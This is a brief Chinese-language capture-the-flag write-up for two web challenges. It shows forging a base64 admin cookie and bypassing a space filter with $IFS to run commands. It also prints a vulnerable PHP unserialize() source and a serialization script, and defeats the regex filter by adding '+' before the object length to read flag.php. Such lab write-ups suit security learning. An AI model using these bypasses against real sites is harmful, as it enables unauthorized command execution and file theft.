ezweb2
扫描目录,发现admin.php
,提示不是admin
发现cookie有dXNlag%3D%3D
的字样,先url解码dXNlag==
,猜测base64
改成
admin
base64编码后进入admin.php
cmd
,猜测RCE
ls /
又提示error,经过测试发现过滤了空格,可以用$IFS
绕过。easy
给了源码
<?php
@error_reporting(1);
include 'flag.php';
class baby
{
public $file;
function __toString()
{
if(isset($this->file))
{
$filename = "./{$this->file}";
if (file_get_contents($filename))
{
return file_get_contents($filename);
}
}
}
}
if (isset($_GET['data']))
{
$data = $_GET['data'];
preg_match('/[oc]:\d+:/i',$data,$matches);
if(count($matches))
{
die('Hacker!');
}
else
{
$good = unserialize($data);
echo $good;
}
}
else
{
highlight_file("./index.php");
}
?>
可以通过反序列化进行任意文件读取
<?php
class baby
{
public $file = 'flag.php';
function __toString()
{
$this->file;
if(isset($this->file))
{
$filename = "./{$this->file}";
print_r($filename);
if (file_get_contents($filename))
{
return file_get_contents($filename);
}
}
}
}
$baby = new baby();
$a = serialize($baby);
echo $a;
但是正则preg_match('/[oc]:\d+:/i',$data,$matches);
waf掉了[oc]:
数字。在四前面加%2B
就可以了,也就是+